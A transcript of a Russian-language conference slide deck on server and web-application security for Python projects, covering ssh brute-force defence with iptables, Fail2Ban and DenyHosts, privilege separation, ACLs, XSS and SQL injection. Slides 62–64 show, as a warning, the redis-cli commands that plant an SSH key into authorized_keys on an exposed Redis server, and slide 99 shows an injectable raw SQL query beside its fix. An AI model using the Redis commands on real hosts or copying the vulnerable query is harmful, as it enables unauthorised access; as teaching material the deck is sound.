Правила безопасности

Transcript

1. Правила безопасности

2. “Прежде чем начать, подпишите NDA”

3. None
4. None
5. None

6. Аргументы • Мы на эту тему не думали. А что-то

   не так? • Ну да, мы собираемся, но пока руки не доходят • Да кому мы нужны? Мы не гугл какой-нибудь • Да там нечего красть.

7. Аргументы • Нет-нет, всё впорядке, продолжайте • Сигнализацию на машину

   тоже не сразу поставили? • Мы живем в эпоху массовых нецелевых взломов. Примероно 70% взломов - нецелевые. • Malware, SPAM, Botnet

8. Сетевой уровень

9. ssh

10. Парольная авторизация

11. Парольная авторизация

12. /var/log/auth.log sshd[7023]: Invalid user phpmyadmin from 123.123.123.1 sshd[7023]: input_userauth_request: invalid

    user phpmyadmin [preauth] sshd[7023]: pam_unix(sshd:auth): check pass; user unknown sshd[7023]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=123.123.123.1 sshd[7023]: Failed password for invalid user phpmyadmin from 123.123.123.1 port 36817 ssh2 sshd[7023]: Received disconnect from 123.123.123.1: 11: Bye Bye [preauth]

13. # grep -c "Failed password" /var/log/auth.log 133994

14. ~ раз в 25 секунд

15. iptables Fail2Ban DenyHosts

16. iptables

17. iptables • Часть ядра Linux

18. iptables • Часть ядра Linux • Невероятно гибкий

19. iptables • Часть ядра Linux • Невероятно гибкий • Вплоть

    до анализа содержимого пакетов (критерий u32)

20. iptables • Часть ядра Linux • Невероятно гибкий • Вплоть

    до анализа содержимого пакетов (критерий u32) • Поддерживает ipv6

21. iptables • Часть ядра Linux • Невероятно гибкий • Вплоть

    до анализа содержимого пакетов (критерий u32) • Поддерживает ipv6 • Требует навыков

22. iptables • Часть ядра Linux • Невероятно гибкий • Вплоть

    до анализа содержимого пакетов (критерий u32) • Поддерживает ipv6 • Требует навыков • Можно напортачить и вообще потерять доступ к серверу

23. Можно напортачить и вообще потерять доступ к серверу

24. iptables-save/iptables-restore

25. Ubuntu/Debian: iptables-persistent

26. iptables -A INPUT -p tcp -i any -m conntrack --ctstate

    NEW --dport 22 -m recent -- update --seconds 15 -j DROP iptables -A INPUT -p tcp -i any -m conntrack --ctstate NEW --dport 22 -m recent -- set -j ACCEPT iptables

27. iptables -A INPUT -p tcp -i any -m conntrack --ctstate

    NEW --dport 22 -m recent -- update --seconds 15 -j DROP iptables -A INPUT -p tcp -i any -m conntrack --ctstate NEW --dport 22 -m recent -- set -j ACCEPT iptables

28. iptables -A INPUT -p tcp -i any -m conntrack --ctstate

    NEW --dport 22 -m recent -- update --seconds 15 -j DROP iptables -A INPUT -p tcp -i any -m conntrack --ctstate NEW --dport 22 -m recent -- set -j ACCEPT iptables

29. iptables -A INPUT -p tcp -i any -m conntrack --ctstate

    NEW --dport 22 -m recent -- update --seconds 15 -j DROP iptables -A INPUT -p tcp -i any -m conntrack --ctstate NEW --dport 22 -m recent -- set -j ACCEPT iptables

30. iptables -A INPUT -p tcp -i any -m conntrack --ctstate

    NEW --dport 22 -m recent -- update --seconds 15 -j DROP iptables -A INPUT -p tcp -i any -m conntrack --ctstate NEW --dport 22 -m recent -- set -j ACCEPT iptables

31. iptables -A INPUT -p tcp -i any -m conntrack --ctstate

    NEW --dport 22 -m recent -- update --seconds 15 -j DROP iptables -A INPUT -p tcp -i any -m conntrack --ctstate NEW --dport 22 -m recent -- set -j ACCEPT iptables

32. DenyHosts

33. DenyHosts • Написан на Python

34. DenyHosts • Написан на Python • Работает через TCP wrappers

    (/etc/hosts.allow, /etc/hosts.deny)

35. DenyHosts • Написан на Python • Работает через TCP wrappers

    (/etc/hosts.allow, /etc/hosts.deny) • Работает с ssh, proftpd и всем, что правильно пишет логи в /var/log/auth. log или /var/log/secure и поддерживает TCP wrappers

36. DenyHosts • Написан на Python • Работает через TCP wrappers

    (/etc/hosts.allow, /etc/hosts.deny) • Работает с ssh, proftpd и всем, что правильно пишет логи в /var/log/auth. log или /var/log/secure и поддерживает TCP wrappers • Email уведомления

37. DenyHosts • Написан на Python • Работает через TCP wrappers

    (/etc/hosts.allow, /etc/hosts.deny) • Работает с ssh, proftpd и всем, что правильно пишет логи в /var/log/auth. log или /var/log/secure и поддерживает TCP wrappers • Email уведомления • Не умеет ipv6

38. DenyHosts • Написан на Python • Работает через TCP wrappers

    (/etc/hosts.allow, /etc/hosts.deny) • Работает с ssh, proftpd и всем, что правильно пишет логи в /var/log/auth. log или /var/log/secure и поддерживает TCP wrappers • Email уведомления • Не умеет ipv6 • Не защищает от распределенных BF-атак

39. Fail2Ban

40. Fail2Ban • Написан на Python

41. Fail2Ban • Написан на Python • Анализирует логи

42. Fail2Ban • Написан на Python • Анализирует логи • Работает

    c TCP wrappers, iptables, PF и другими фаерволами

43. Fail2Ban • Написан на Python • Анализирует логи • Работает

    c TCP wrappers, iptables, PF и другими фаерволами • Может не только ssh, но и Apache, Lighttpd, vsftpd, qmail, Postfix

44. Fail2Ban • Написан на Python • Анализирует логи • Работает

    c TCP wrappers, iptables, PF и другими фаерволами • Может не только ssh, но и Apache, Lighttpd, vsftpd, qmail, Postfix • Легко расширяется с помощью regex

45. Fail2Ban • Написан на Python • Анализирует логи • Работает

    c TCP wrappers, iptables, PF и другими фаерволами • Может не только ssh, но и Apache, Lighttpd, vsftpd, qmail, Postfix • Легко расширяется с помощью regex • Email-уведомления

46. Fail2Ban • Написан на Python • Анализирует логи • Работает

    c TCP wrappers, iptables, PF и другими фаерволами • Может не только ssh, но и Apache, Lighttpd, vsftpd, qmail, Postfix • Легко расширяется с помощью regex • Email-уведомления • Не умеет ipv6

47. Fail2Ban • Написан на Python • Анализирует логи • Работает

    c TCP wrappers, iptables, PF и другими фаерволами • Может не только ssh, но и Apache, Lighttpd, vsftpd, qmail, Postfix • Легко расширяется с помощью regex • Email-уведомления • Не умеет ipv6 • Не защищает от распределенных BF-атак

48. FTP

49. FTP

50. SFTP

51. Любые открытые порты

52. Сервер приложений 10.0.0.1 Сервер приложений 10.0.0.2 Сервер БД (Например mysql)

    10.0.0.3:3306

53. Сервер приложений 10.0.0.1 Сервер приложений 10.0.0.2 Сервер БД (Например mysql)

    10.0.0.3:3306

54. VPN

55. Сервер приложений 10.0.0.1 172.0.0.1 Сервер приложений 10.0.0.2 172.0.0.2 Сервер БД

    (Например mysql) 172.0.0.3:3306 VPN

56. Сервер приложений 10.0.0.1 172.0.0.1 Сервер приложений 10.0.0.2 172.0.0.2 VPN Сервер

    БД (Например mysql) 172.0.0.3:3306

57. iptables

58. iptables -A INPUT -p tcp -s 10.0.0.1 --dport 3306 -j

    ACCEPT iptables -A INPUT -p tcp -s 10.0.0.2 --dport 3306 -j ACCEPT iptables -A INPUT -p tcp --dport 3306 -j DROP iptables на сервере БД

59. Fail2Ban https://brain.demonpenguin.co.uk/2014/05/01/fail2ban-monitoring-mysql/

60. Например

61. http://antirez.com/news/96

62. Например $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")

    > foo.txt $ redis-cli -h 192.168.1.11 echo flushall $ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit

63. Например $ redis-cli -h 192.168.1.11 192.168.1.11:6379> config set dir /home/redis/.ssh/

    OK 192.168.1.11:6379> config get dir 1) "dir" 2) "/home/redis/.ssh/" 192.168.1.11:6379> config set dbfilename "authorized_keys" OK 192.168.1.11:6379> save OK

64. ssh [email protected]

65. Уровень ОС

66. Каждый процесс от отдельного пользователя

67. Каждый процесс от отдельного юзера • nginx • supervisor •

    Redis • База данных • Ваше приложение

68. Избегайте запуска от root

69. Один пользователь - один проект

70. Один пользователь - один проект ubuntu@server:~$ ls -la total 72

    drwxr-xr-x 11 ubuntu ubuntu 4096 Nov 5 10:01 . drwxr-xr-x 4 root root 4096 Dec 19 2014 .. drwxr-xr-x 8 ubuntu ubuntu 4096 Mar 27 2015 project_1 drwxr-xr-x 8 ubuntu ubuntu 4096 Nov 3 11:06 project_2 drwxr-xr-x 8 ubuntu ubuntu 4096 Dec 9 00:19 project_99

71. Мы используем virtualenv

72. Мы используем virtualenv

73. Один пользователь - один проект ubuntu@server:~$ ls -la total 72

    drwxr-xr-x 11 ubuntu ubuntu 4096 Nov 5 10:01 . drwxr-xr-x 4 root root 4096 Dec 19 2014 .. drwxr-xr-x 8 ubuntu ubuntu 4096 Mar 27 2015 project_1 drwxr-xr-x 8 ubuntu ubuntu 4096 Nov 3 11:06 project_2 drwxr-xr-x 8 ubuntu ubuntu 4096 Dec 9 00:19 project_99

74. Один пользователь - один проект ubuntu@server:~$ ls -la total 72

    drwxr-xr-x 11 ubuntu ubuntu 4096 Nov 5 10:01 . drwxr-xr-x 4 root root 4096 Dec 19 2014 .. drwxr-xr-x 8 project1 project1 4096 Mar 27 2015 project_1 drwxr-xr-x 8 project2 project2 4096 Nov 3 11:06 project_2 drwxr-xr-x 8 project99 project99 4096 Dec 9 00:19 project_99

75. Один пользователь - один проект ubuntu@server:~$ ls -la total 72

    drwxr-xr-x 11 ubuntu ubuntu 4096 Nov 5 10:01 . drwxr-xr-x 4 root root 4096 Dec 19 2014 .. drwxr-xr-x 8 project1 project1 4096 Mar 27 2015 project_1 drwxr-xr-x 8 project2 project2 4096 Nov 3 11:06 project_2 drwxr-xr-x 8 project99 project99 4096 Dec 9 00:19 project_99

76. Nginx выдаёт 403 Forbidden для статики

77. chmod -R 755 /path/to/static/

78. chmod -R 755 /path/to/static/

79. chmod -R 750 /path/to/static/ usermod -a -G www-data project1

80. chmod -R 750 /path/to/static/ usermod -a -G www-data project1

81. ACL - тонкая настройка прав доступа

82. ACL - тонкая настройка прав доступа Допустим статика лежит в

    /path/to/static/ setfacl -m u:www-data:x /path/ setfacl -m u:www-data:x /path/to/ setfacl -Rm u:www-data:rx /path/to/static/ setfacl -Rm d:u:www-data:x /path/to/static/

83. ACL $ getfacl /path/to/static/ user::rwx user:www-data:r-x default:user::rwx default:user:www-data:r-x

84. Уровень приложений

85. Python 2.7 и 3.2

86. PYTHONHASHSEED

87. PYTHONHASHSEED=random python -R

88. DDoS через hash коллизии

89. XSS. Пассивные и хранимые

90. Всё что приходит от пользователя — потенциально опасно

91. WYSIWYG

92. {{ wysiwyg|safe }}

93. Разрешено всё

94. Составьте список разрешенных тегов и обрезайте лишние

95. На сервере

96. html5lib, BeautifulSoup, bleach

97. SQL-injection

98. Entry.objects.raw()

99. Entry.objects.raw() Entry.objects.raw(""" SELECT * FROM myapp_entry WHERE title = %s

    """ % title)

100. Entry.objects.raw() Entry.objects.raw(""" SELECT * FROM myapp_entry WHERE title = %s

     """, [title])

101. http://example.com/api/ajax/?q=SELECT%20tit%2Ctitle% 2Cshow_%2Ctop_%20FROM%20news%20WHERE% 20show_!%3D0%20AND%20show_!%3D3%20AND% 20show_!%3D2%20AND%20index!%3D1%20ORDER% 20BY%20show_%20DESC%20%2C%20id% 20DESC&start=0&q2=undefined&last_time=undefined

102. SELECT tit,title,show_,top_ FROM news WHERE show_!=0 AND show_!=3 AND show_!=2

     AND index!=1 ORDER BY show_ DESC , id DESC

103. Ещё ложку дёгтя

104. Неподконтрольные риски

105. Облака

106. Хост Наша супер надежная виртуалка

107. Хост Наша супер надежная виртуалка «Обычный Калибан»

108. Хост Наша супер надежная виртуалка

109. Хост Наша супер надежная виртуалка https://xakep.ru/2012/09/07/59284/

110. Устали?

111. Ведь это только начало =)

112. None

113. • Защита рабочих мест • Социальная инженерия • Данные в

     публичных сетях

114. Если у вас параноя, это не значит что за вами

     не следят ;)

115. Спасибо! Вопросы? [email protected] https://facebook.com/pyhoster http://vladimir.filonov.name